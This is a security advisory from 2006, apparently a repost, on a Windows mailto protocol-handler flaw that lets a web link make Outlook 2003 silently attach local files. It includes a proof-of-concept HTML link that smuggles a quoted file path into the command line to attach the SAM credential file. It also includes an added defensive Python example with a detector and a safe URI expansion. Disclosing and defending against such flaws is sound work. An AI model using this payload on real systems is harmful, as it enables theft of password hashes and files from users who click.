Multiple browsers Windows mailto protocol Office 2003 file attachment exploit

2006.04.27
Risk: Low
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

** Inge Henriksen Security Advisory http://ingehenriksen.blogspot.com/ **

Advisory Name: Multiple browsers Windows mailto protocol Office 2003 file attachment exploit
Release Date: Not released

Tested and Confirmed Vulnerable:
  Microsoft Outlook 2003 SP 1
  Microsoft Internet Explorer 6 SP2
  Mozilla Firefox 1.06
  Avant Browser 10.1 Build 17

Severity: Low
Type: Stealing files
From where: Remote
Discovered by: Inge Henriksen (inge.henriksen (at) booleansoft (dot) com) http://ingehenriksen.blogspot.com/
Vendor Status: Not notified

Overview:

Application protocol handling in Microsoft Windows is badly designed. When someone types mailto:someone@somewhere.com into a browser, the protocol is first looked up under HKEY_CLASSES_ROOT\%protocol%\shell\open\command. If it is a protocol that is allowed under the current user context, the %1 placeholder in that value is simply replaced by the contents of the address bar. In our example

  "C:\PROGRA~1\MICROS~3\OFFICE11\OUTLOOK.EXE" -c IPM.Note /m "%1"

would become

  "C:\PROGRA~1\MICROS~3\OFFICE11\OUTLOOK.EXE" -c IPM.Note /m "mailto:someone@somewhere.com"

There is absolutely no input validation in all the browsers I have tested, so exploits are available by entering more data into the address bar than was intended.

Proof of Concept:

The mailto application protocol can be exploited by entering <email>""<filepath>. This causes OUTLOOK.EXE to attach the file <filepath> to the email without asking for permission, opening the way for sensitive files to be stolen when the user sends the email. It is fair to believe that many people would not notice the attached file before sending the email.

To attach the SAM file to an email, an HTML file could contain this:

  <a href='mailto:someone@somewhere.com""..\..\..\..\..\windows\REPAIR\SAM'>Click here to email me</a>

The command being run would now be:

  "C:\PROGRA~1\MICROS~3\OFFICE11\OUTLOOK.EXE" -c IPM.Note /m "mailto:someone@somewhere.com""..\..\..\..\..\windows\REPAIR\SAM"

thus attaching the SAM file.
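The missing input validation described above can be shown from the caller's side. The following is an added example, not code from the advisory or from any browser: it contrasts verbatim %1 substitution with a scheme check plus percent-encoding. The shortened handler path, the function names and the sample path are assumptions made for illustration.

```python
from urllib.parse import quote

# Handler command template in the shape the advisory quotes (path shortened here).
TEMPLATE = '"OUTLOOK.EXE" -c IPM.Note /m "%1"'

# Characters RFC 3986 permits in a URI besides letters, digits and "-._~".
# '"', '\\' and space are absent, so quote() turns them into %22, %5C and %20.
URI_SAFE = ":/?#[]@!$&'()*+,;=%"


def naive_expand(template: str, uri: str) -> str:
    """Substitute %1 verbatim, as the advisory describes the browsers doing."""
    return template.replace("%1", uri)


def breaks_quoting(uri: str) -> bool:
    """True if the raw URI can end the quoted "%1" argument early.

    A double quote closes the argument; a backslash can escape the template's
    closing quote; control characters have no place in a command line.
    """
    return any(c in '"\\' or ord(c) < 0x20 for c in uri)


def safe_expand(template: str, uri: str, allowed_schemes=("mailto",)) -> str:
    """Validate the scheme, then percent-encode before substituting."""
    scheme, sep, _ = uri.partition(":")
    if not sep or scheme.lower() not in allowed_schemes:
        raise ValueError(f"scheme not allowed: {scheme!r}")
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in uri):
        raise ValueError("control character in URI")
    return template.replace("%1", quote(uri, safe=URI_SAFE))


if __name__ == "__main__":
    # Constructed input in the <email>""<filepath> shape from the proof of concept.
    sample = 'mailto:someone@somewhere.com""..\\..\\example.txt'
    print(breaks_quoting(sample))          # detection on the raw value
    print(naive_expand(TEMPLATE, sample))  # quotes leak into the command line
    print(safe_expand(TEMPLATE, sample))   # value stays inside one argument
```

Encoding only keeps the value inside a single quoted argument; the handler must still treat the decoded value as an address and nothing else.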


Copyright 2021, cxsecurity.com

 
